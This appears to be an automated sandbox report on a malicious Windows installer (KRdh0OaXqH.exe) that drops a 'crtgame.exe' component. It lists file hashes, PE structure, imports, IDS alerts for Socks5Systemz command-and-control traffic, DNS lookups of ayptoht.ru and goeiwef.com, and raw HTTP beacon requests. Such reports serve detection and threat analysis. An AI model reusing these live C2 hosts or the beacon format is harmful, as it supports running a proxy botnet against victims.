                                                                                          SHA-256:59495C6E79C301F767F3D336050FB9927826F0AE972D634D395F5B44D7280A09
                                                                                          SHA-512:4BE3E838FB41CD4D01A12B639CDCB93DF94DEEC0DEBD2593C53BBFE977DAF5BCB9E3F97F6C47D33E76AEA12AE2F9224F27652DFB5B5A69F53D201184766FFF91
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........k.....................r.......................................6.......Rich............................PE..L.....ue.................@...................P....@...........................!......."......................................Y..P........G...........................................................................P...............................text....;.......@.................. ..`.rdata.......P... ...P..............@..@.data....P...p...0...p..............@....rsrc....G.......P..................@..@.hsave....... ......................`...................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:data
                                                                                          Category:dropped
                                                                                          Size (bytes):4
                                                                                          Entropy (8bit):0.8112781244591328
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1ln:v
                                                                                          MD5:34F45818F16D1BBB62BA5874B8814CC7
                                                                                          SHA1:A454CA483B4A66B83826D061BE2859DD79FF0D6C
                                                                                          SHA-256:DC765660B06EE03DD16FD7CA5B957E8C805161AC2C4AF28C5A100AB2AB432CA1
                                                                                          SHA-512:65711C8D556639DDFC14CE292B2415F3A2824D003AF1A530093B8E0B70B695E6C639694B7B90C6750B1129566D9A3784ED274667988D4B227DB2AC9B6CF7548B
                                                                                          Malicious:false
                                                                                          Preview:....
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:ASCII text, with no line terminators
                                                                                          Category:dropped
                                                                                          Size (bytes):128
                                                                                          Entropy (8bit):2.862976125752538
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:1k/QnTzXD9iIgAnDTa3pkHil/:11TzXD9iIxPa3pkHit
                                                                                          MD5:785BB7F0B0CEF59C39B9F5E21CD2FD04
                                                                                          SHA1:1E1FFDEE1584A00BDE18BD7BD19C02988301C250
                                                                                          SHA-256:90B35EC0C6B41ACEC2C9BB51CDDCB6339FB035C222766A4CA4CBB15B7A7D8853
                                                                                          SHA-512:6D2449E111F7F059734960B83B0B090A7239EE2D93EB70F839ECDDAA640658B90667F123CFB4FE8E0F5DC0A854A47B62AA2FCAF971D08B9118CAC840DBF999EB
                                                                                          Malicious:false
                                                                                          Preview:3e0f25005939fee32fa196d33e7a2b8f6ce30e1128f6a30e537a9ba072d59a73................................................................
                                                                                          Process:C:\Program Files (x86)\CRTGame\crtgame.exe
                                                                                          File Type:OpenPGP Secret Key
                                                                                          Category:dropped
                                                                                          Size (bytes):8
                                                                                          Entropy (8bit):2.0
                                                                                          Encrypted:false
                                                                                          SSDEEP:3:0ll:0/
                                                                                          MD5:89FB9612A4F22B2D98B691F0B2F3B75C
                                                                                          SHA1:52E7CA16A90F332335E33C6408D5AE95C3EECD20
                                                                                          SHA-256:412A42092F1B5ECB0CF85688E0EC31EE119225DDF33241FE872A371402DF4CAF
                                                                                          SHA-512:C3000EF814064A83B93D4D8611160C46E59401E4442C1DE70CDA2CB307CE41C89F9C24AF193FC17780C919719BB4CAF4CC032DCC0EC86BCCAD51191DB1F9462F
                                                                                          Malicious:false
                                                                                          Preview:..]g....
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):4096
                                                                                          Entropy (8bit):4.026670007889822
                                                                                          Encrypted:false
                                                                                          SSDEEP:48:ivuz1hEU3FR/pmqBl8/QMCBaquEMx5BC+SS4k+bkguj0KHc:bz1eEFNcqBC/Qrex5iSKDkc
                                                                                          MD5:0EE914C6F0BB93996C75941E1AD629C6
                                                                                          SHA1:12E2CB05506EE3E82046C41510F39A258A5E5549
                                                                                          SHA-256:4DC09BAC0613590F1FAC8771D18AF5BE25A1E1CB8FDBF4031AA364F3057E74A2
                                                                                          SHA-512:A899519E78125C69DC40F7E371310516CF8FAA69E3B3FF747E0DDF461F34E50A9FF331AB53B4D07BB45465039E8EBA2EE4684B3EE56987977AE8C7721751F5F9
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.....................H................|.......|.......|......Rich............PE..L....M;J..................................... ....@..........................@..............................................l ..P....0..@............................................................................ ..D............................text............................... ..`.rdata....... ......................@..@.rsrc...@....0......................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):2560
                                                                                          Entropy (8bit):2.8818118453929262
                                                                                          Encrypted:false
                                                                                          SSDEEP:24:e1GSgDIX566lIB6SXvVmMPUjvhBrDsqZ:SgDKRlVImgUNBsG
                                                                                          MD5:A69559718AB506675E907FE49DEB71E9
                                                                                          SHA1:BC8F404FFDB1960B50C12FF9413C893B56F2E36F
                                                                                          SHA-256:2F6294F9AA09F59A574B5DCD33BE54E16B39377984F3D5658CDA44950FA0F8FC
                                                                                          SHA-512:E52E0AA7FE3F79E36330C455D944653D449BA05B2F9ABEE0914A0910C3452CFA679A40441F9AC696B3CCF9445CBB85095747E86153402FC362BB30AC08249A63
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........W.c.W.c.W.c...>.T.c.W.b.V.c.R.<.V.c.R.?.V.c.R.9.V.c.RichW.c.........................PE..L....b.@...........!......................... ...............................@......................................p ..}.... ..(............................0....................................................... ...............................text............................... ..`.rdata....... ......................@..@.reloc.......0......................@..B................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):19456
                                                                                          Entropy (8bit):5.8975201046735535
                                                                                          Encrypted:false
                                                                                          SSDEEP:384:ED4NeA1PrXPBdHCNPJEQkWybd0oBSRnAZ806OSDrgtOFXqYUPYNQLJ/k+9tPEBer:64NHPfHCs6GNOpiM+RFjFyzcN23A
                                                                                          MD5:3ADAA386B671C2DF3BAE5B39DC093008
                                                                                          SHA1:067CF95FBDB922D81DB58432C46930F86D23DDED
                                                                                          SHA-256:71CD2F5BC6E13B8349A7C98697C6D2E3FCDEEA92699CEDD591875BEA869FAE38
                                                                                          SHA-512:BBE4187758D1A69F75A8CCA6B3184E0C20CF8701B16531B55ED4987497934B3C9EF66ECD5E6B83C7357F69734F1C8301B9F82F0A024BB693B732A2D5760FD303
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......g...#~..#~..#~...q.. ~..#~..!~......"~......+~......"~......"~..Rich#~..........................PE..L....[.L...........!.....6...........E.......P.......................................................................P.......P..(............................p.......................................................P...............................text....5.......6.................. ..`.rdata.......P.......:..............@..@.data...8....`.......<..............@....reloc.......p.......J..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                                          Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
                                                                                          File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                          Category:dropped
                                                                                          Size (bytes):6144
                                                                                          Entropy (8bit):4.215994423157539
                                                                                          Encrypted:false
                                                                                          SSDEEP:96:sfkcXegaJ/ZAYNzcld1xaX12pS5SKvkc:sfJEVYlvxaX12EF
                                                                                          MD5:4FF75F505FDDCC6A9AE62216446205D9
                                                                                          SHA1:EFE32D504CE72F32E92DCF01AA2752B04D81A342
                                                                                          SHA-256:A4C86FC4836AC728D7BD96E7915090FD59521A9E74F1D06EF8E5A47C8695FD81
                                                                                          SHA-512:BA0469851438212D19906D6DA8C4AE95FF1C0711A095D9F21F13530A6B8B21C3ACBB0FF55EDB8A35B41C1A9A342F5D3421C00BA395BC13BB1EF5902B979CE824
                                                                                          Malicious:false
                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......^...............l...............=\......=\......=\......Rich............................PE..d...XW:J..........#............................@.............................`..............................................................<!.......P..@....@..0.................................................................... ...............................text............................... ..`.rdata..|.... ......................@..@.data...,....0......................@....pdata..0....@......................@..@.rsrc...@....P......................@..@................................................................................................................................................................................................................................................................................................................................

Process:C:\Users\user\AppData\Local\Temp\is-TNUT0.tmp\KRdh0OaXqH.tmp
File Type:PE32 executable (DLL) (GUI) Intel 80386 (stripped to external PDB), for MS Windows
Category:dropped
Size (bytes):23312
Entropy (8bit):4.596242908851566
Encrypted:false
SSDEEP:384:+Vm08QoKkiWZ76UJuP71W55iWHHoSHigH2euwsHTGHVb+VHHmnH+aHjHqLHxmoq1:2m08QotiCjJuPGw4
MD5:92DC6EF532FBB4A5C3201469A5B5EB63
SHA1:3E89FF837147C16B4E41C30D6C796374E0B8E62C
SHA-256:9884E9D1B4F8A873CCBD81F8AD0AE257776D2348D027D811A56475E028360D87
SHA-512:9908E573921D5DBC3454A1C0A6C969AB8A81CC2E8B5385391D46B1A738FB06A76AA3282E0E58D0D2FFA6F27C85668CD5178E1500B8A39B1BBAE04366AE6A86D3
Malicious:false

Process:C:\Users\user\Desktop\KRdh0OaXqH.exe
File Type:PE32 executable (GUI) Intel 80386, for MS Windows
Category:dropped
Size (bytes):704000
Entropy (8bit):6.4972640482038075
Encrypted:false
SSDEEP:12288:XRObekMSkfohrPUs37uzHnA6zg5cItMpAHERI/rNkQRwW/6FXzb0ZDExyc:BObekrkfohrP337uzHnA6cHiiHEVVg6X
MD5:F448D7F4B76E5C9C3A4EAFF16A8B9B73
SHA1:31808F1FFA84C954376975B7CDB0007E6B762488
SHA-256:7233B85EB0F8B3AA5CAE3811D727AA8742FEC4D1091C120A0FE15006F424CC49
SHA-512:F8197458CD2764C0B852DAC34F9BF361110A7DC86903024A97C7BCD3F77B148342BF45E3C2B60F6AF8198AE3B83938DBAAD5E007D71A0F88006F3A0618CF36F4
Malicious:true

File type:PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):7.999404762558587
TrID:
• Win32 Executable (generic) a (10002005/4) 98.86%
• Inno Setup installer (109748/4) 1.08%
• Win16/32 Executable Delphi generic (2074/23) 0.02%
• Generic Win/DOS Executable (2004/3) 0.02%
• DOS Executable Generic (2002/1) 0.02%
File name:KRdh0OaXqH.exe
File size:7'246'011 bytes
MD5:61ab9f06b48b8df40ce15ce9252c0531
SHA1:02d1610e771bea84c27aafd05df21dcb300420e5
SHA256:732bccaeb50d50526b5f6c8817ce889d04fb7b67a52b88f79e223d4cf9b807ae
SHA512:f6761a7849aca0edda28e1951fe998578588c3e93b58bc6444538e5b3cec3407742c24b923d8b7aa33ea3f9417a6eab0c9612964b0eb17196931d3127166b3f1
SSDEEP:196608:dK2+nNevvWstwr2m5BmycyEbSfasepd5e4x6+AjZ6mjxzj:dDY6tiP3myRfzepXe4ny8gxzj
TLSH:96763373295C173AE240CA3166AFE1A9E16A3F3DD53B0690E2C4B1BD1BDF8E1581C725
Icon Hash:2d2e3797b32b2b99
Entrypoint:0x409c40
Entrypoint Section:CODE
Digitally signed:false
Imagebase:0x400000
Subsystem:windows gui
Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
DLL Characteristics:TERMINAL_SERVER_AWARE
Time Stamp:0x65765E3E [Mon Dec 11 00:56:30 2023 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:1
OS Version Minor:0
File Version Major:1
File Version Minor:0
Subsystem Version Major:1
Subsystem Version Minor:0
Import Hash:884310b1928934402ea6fec1dbd3cf5e
Instruction
push ebp
mov ebp, esp
add esp, FFFFFFC4h
push ebx
push esi
push edi
xor eax, eax
mov dword ptr [ebp-10h], eax
mov dword ptr [ebp-24h], eax
call 00007F64310CEAEBh
call 00007F64310CFCF2h
call 00007F64310CFF81h
call 00007F64310D1FB8h
call 00007F64310D1FFFh
call 00007F64310D492Eh
call 00007F64310D4A95h
xor eax, eax
push ebp
push 0040A2FCh
push dword ptr fs:[eax]
mov dword ptr fs:[eax], esp
xor edx, edx
push ebp
push 0040A2C5h
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
mov eax, dword ptr [0040C014h]
call 00007F64310D54FBh
call 00007F64310D512Eh
lea edx, dword ptr [ebp-10h]
xor eax, eax
call 00007F64310D25E8h
mov edx, dword ptr [ebp-10h]
mov eax, 0040CDE8h
call 00007F64310CEB97h
push 00000002h
push 00000000h
push 00000001h
mov ecx, dword ptr [0040CDE8h]
mov dl, 01h
mov eax, 0040738Ch
call 00007F64310D2E77h
mov dword ptr [0040CDECh], eax
xor edx, edx
push ebp
push 0040A27Dh
push dword ptr fs:[edx]
mov dword ptr fs:[edx], esp
call 00007F64310D556Bh
mov dword ptr [0040CDF4h], eax
mov eax, dword ptr [0040CDF4h]
cmp dword ptr [eax+0Ch], 01h
jne 00007F64310D56AAh
mov eax, dword ptr [0040CDF4h]
mov edx, 00000028h
call 00007F64310D3278h
mov edx, dword ptr [000000F4h]
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xd000 | 0x950 | .idata
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x11000 | 0x2c00 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0xf000 | 0x18 | .rdata
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
CODE | 0x1000 | 0x9364 | 0x9400 | 0d7ac17dafcd52a9b3ea353c32256c1d | False | 0.6148648648648649 | data | 6.56223225792919 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
DATA | 0xb000 | 0x24c | 0x400 | 45829356498700390b8c7afa10ea05a4 | False | 0.31640625 | data | 2.7585022150416294 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
BSS | 0xc000 | 0xe4c | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata | 0xd000 | 0x950 | 0xa00 | bb5485bf968b970e5ea81292af2acdba | False | 0.414453125 | data | 4.430733069799036 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls | 0xe000 | 0x8 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rdata | 0xf000 | 0x18 | 0x200 | 9ba824905bf9c7922b6fc87a38b74366 | False | 0.052734375 | data | 0.2044881574398449 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.reloc | 0x10000 | 0x8b4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
.rsrc | 0x11000 | 0x2c00 | 0x2c00 | 12ab88ff2529942b16e663a514fbedee | False | 0.32262073863636365 | data | 4.461731535554609 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_SHARED, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0x11354 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | Dutch | Netherlands | 0.5675675675675675
RT_ICON | 0x1147c | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 320 | Dutch | Netherlands | 0.4486994219653179
RT_ICON | 0x119e4 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 640 | Dutch | Netherlands | 0.4637096774193548
RT_ICON | 0x11ccc | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 1152 | Dutch | Netherlands | 0.3935018050541516
RT_STRING | 0x12574 | 0x2f2 | data | | | 0.35543766578249336
RT_STRING | 0x12868 | 0x30c | data | | | 0.3871794871794872
RT_STRING | 0x12b74 | 0x2ce | data | | | 0.42618384401114207
RT_STRING | 0x12e44 | 0x68 | data | | | 0.75
RT_STRING | 0x12eac | 0xb4 | data | | | 0.6277777777777778
RT_STRING | 0x12f60 | 0xae | data | | | 0.5344827586206896
RT_RCDATA | 0x13010 | 0x2c | data | | | 1.1818181818181819
RT_GROUP_ICON | 0x1303c | 0x3e | data | English | United States | 0.8387096774193549
RT_VERSION | 0x1307c | 0x4b8 | COM executable for DOS | English | United States | 0.27483443708609273
RT_MANIFEST | 0x13534 | 0x560 | XML 1.0 document, ASCII text, with CRLF line terminators | English | United States | 0.4251453488372093
DLL | Import
kernel32.dll | DeleteCriticalSection, LeaveCriticalSection, EnterCriticalSection, InitializeCriticalSection, VirtualFree, VirtualAlloc, LocalFree, LocalAlloc, WideCharToMultiByte, TlsSetValue, TlsGetValue, MultiByteToWideChar, GetModuleHandleA, GetLastError, GetCommandLineA, WriteFile, SetFilePointer, SetEndOfFile, RtlUnwind, ReadFile, RaiseException, GetStdHandle, GetFileSize, GetSystemTime, GetFileType, ExitProcess, CreateFileA, CloseHandle
user32.dll | MessageBoxA
oleaut32.dll | VariantChangeTypeEx, VariantCopyInd, VariantClear, SysStringLen, SysAllocStringLen
advapi32.dll | RegQueryValueExA, RegOpenKeyExA, RegCloseKey, OpenProcessToken, LookupPrivilegeValueA
kernel32.dll | WriteFile, VirtualQuery, VirtualProtect, VirtualFree, VirtualAlloc, Sleep, SizeofResource, SetLastError, SetFilePointer, SetErrorMode, SetEndOfFile, RemoveDirectoryA, ReadFile, LockResource, LoadResource, LoadLibraryA, IsDBCSLeadByte, GetWindowsDirectoryA, GetVersionExA, GetUserDefaultLangID, GetSystemInfo, GetSystemDefaultLCID, GetProcAddress, GetModuleHandleA, GetModuleFileNameA, GetLocaleInfoA, GetLastError, GetFullPathNameA, GetFileSize, GetFileAttributesA, GetExitCodeProcess, GetEnvironmentVariableA, GetCurrentProcess, GetCommandLineA, GetACP, InterlockedExchange, FormatMessageA, FindResourceA, DeleteFileA, CreateProcessA, CreateFileA, CreateDirectoryA, CloseHandle
user32.dll | TranslateMessage, SetWindowLongA, PeekMessageA, MsgWaitForMultipleObjects, MessageBoxA, LoadStringA, ExitWindowsEx, DispatchMessageA, DestroyWindow, CreateWindowExA, CallWindowProcA, CharPrevA
comctl32.dll | InitCommonControls
advapi32.dll | AdjustTokenPrivileges
Language of compilation system | Country where language is spoken
Dutch | Netherlands
English | United States
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-14T20:08:04.972631+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:04.972631+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:18.112716+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:18.112716+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:31.253208+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49848 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:31.253208+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49848 | 94.232.249.187 | 80 | TCP
2024-12-14T20:08:50.004899+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:50.004899+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:53.823630+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:53.823630+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:55.343124+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49920 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:55.343124+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49920 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:56.958667+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:56.958667+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49923 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:58.465548+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:58.465548+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49929 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:59.978702+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49934 | 185.237.206.129 | 80 | TCP
2024-12-14T20:08:59.978702+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49934 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:01.494245+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49936 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:01.494245+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49936 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:03.069320+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:03.069320+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49942 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:04.592642+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49947 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:04.592642+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49947 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:06.109041+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49953 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:06.109041+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49953 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:07.633464+0100 | 2049467 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M1 | 1 | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
2024-12-14T20:09:07.633464+0100 | 2049468 | ET MALWARE [ANY.RUN] Socks5Systemz HTTP C2 Connection M2 | 1 | 192.168.2.5 | 49955 | 185.237.206.129 | 80 | TCP
Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
Dec 14, 2024 20:07:56.542761087 CET | 192.168.2.5 | 81.31.197.38 | 0x80a4 | Standard query (0) | ayptoht.ru | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:36.269870996 CET | 192.168.2.5 | 194.49.94.194 | 0xb105 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:37.284583092 CET | 192.168.2.5 | 194.49.94.194 | 0xb105 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:38.300178051 CET | 192.168.2.5 | 194.49.94.194 | 0xb105 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:40.300251961 CET | 192.168.2.5 | 194.49.94.194 | 0xb105 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:44.315768957 CET | 192.168.2.5 | 194.49.94.194 | 0xb105 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:48.318428993 CET | 192.168.2.5 | 152.89.198.214 | 0x2c41 | Standard query (0) | goeiwef.com | A (IP address) | IN (0x0001) | false
Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
Dec 14, 2024 20:07:56.782834053 CET | 81.31.197.38 | 192.168.2.5 | 0x80a4 | No error (0) | ayptoht.ru | | 94.232.249.187 | A (IP address) | IN (0x0001) | false
Dec 14, 2024 20:08:48.597795963 CET | 152.89.198.214 | 192.168.2.5 | 0x2c41 | No error (0) | goeiwef.com | | 185.237.206.129 | A (IP address) | IN (0x0001) | false
• ayptoht.ru
• goeiwef.com
Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
0 | 192.168.2.5 | 49788 | 94.232.249.187 | 80 | 5884 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 20:07:56.957845926 CET | 294 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
Host: ayptoht.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
1 | 192.168.2.5 | 49818 | 94.232.249.187 | 80 | 5884 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 20:08:10.109920025 CET | 294 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
Host: ayptoht.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
2 | 192.168.2.5 | 49848 | 94.232.249.187 | 80 | 5884 | C:\Program Files (x86)\CRTGame\crtgame.exe
Timestamp | Bytes transferred | Direction | Data
Dec 14, 2024 20:08:23.250157118 CET | 294 | OUT | GET /click/?counter=de7ef49b2c006853fb383e7c6101f04130fc1905c311578eaae3c7edb62dde24353e1d9a943e9d15038842974dbc1dbaf7a1439f558166429e289d5b86953e226c55f676647fc2813369d184da3259568ddb05fb19ca HTTP/1.1
Host: ayptoht.ru
User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
3 | 192.168.2.5 | 49904 | 185.237.206.129 | 80 | 5884 | C:\Program Files (x86)\CRTGame\crtgame.exe
